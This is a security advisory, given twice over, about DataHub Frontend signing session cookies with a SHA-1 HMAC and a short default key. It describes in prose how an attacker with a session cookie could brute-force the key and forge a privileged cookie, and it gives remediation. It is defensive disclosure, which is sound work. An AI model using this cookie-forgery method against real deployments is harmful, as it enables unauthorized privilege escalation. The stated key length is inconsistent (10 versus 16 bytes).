Summary
The HMAC signature for DataHub Frontend sessions was being signed using a SHA-1 HMAC with the frontend secret key. SHA1 with a 10 byte key can be brute forced using sufficient resources (i.e. state level actors with large computational capabilities).
Details
DataHub Frontend was utilizing the Play LegacyCookiesModule with default settings which utilizes a SHA1 HMAC for signing. This is compounded by using a shorter key length than recommended by default for the signing key for the randomized secret value. An authenticated attacker (or attacker who has otherwise obtained a session token) could crack the signing key for DataHub and obtain escalated privileges by generating a privileged session cookie. Due to key length being a part of the risk, deployments should update to the latest helm chart and rotate their session signing secret.
PoC
Using a few hundred thousand dollars worth of compute resources, a motivated actor can brute force all combinations of the 16 byte signing key to generate a SHA1 HMAC for a given session cookie, changing the user to a more privileged one. Attacker needs to either be able to authenticate successfully to obtain their own session cookie or obtain a session cookie from a logged in user through some other means.
Impact
All deployments using the default helm chart configurations for generating the Play secret key used for signing.
Credit
Dor Konis - GE Vernova
Amit Laish - GE Vernova
amit-laish Reporter
dkonis Reporter
Summary
The HMAC signature for DataHub Frontend sessions was being signed using a SHA-1 HMAC with the frontend secret key. SHA1 with a 10 byte key can be brute forced using sufficient resources (i.e. state level actors with large computational capabilities).
Details
DataHub Frontend was utilizing the Play LegacyCookiesModule with default settings which utilizes a SHA1 HMAC for signing. This is compounded by using a shorter key length than recommended by default for the signing key for the randomized secret value. An authenticated attacker (or attacker who has otherwise obtained a session token) could crack the signing key for DataHub and obtain escalated privileges by generating a privileged session cookie. Due to key length being a part of the risk, deployments should update to the latest helm chart and rotate their session signing secret.
PoC
Using a few hundred thousand dollars worth of compute resources, a motivated actor can brute force all combinations of the 16 byte signing key to generate a SHA1 HMAC for a given session cookie, changing the user to a more privileged one. Attacker needs to either be able to authenticate successfully to obtain their own session cookie or obtain a session cookie from a logged in user through some other means.
Impact
All deployments using the default helm chart configurations for generating the Play secret key used for signing.
Credit
Dor Konis - GE Vernova
Amit Laish - GE Vernova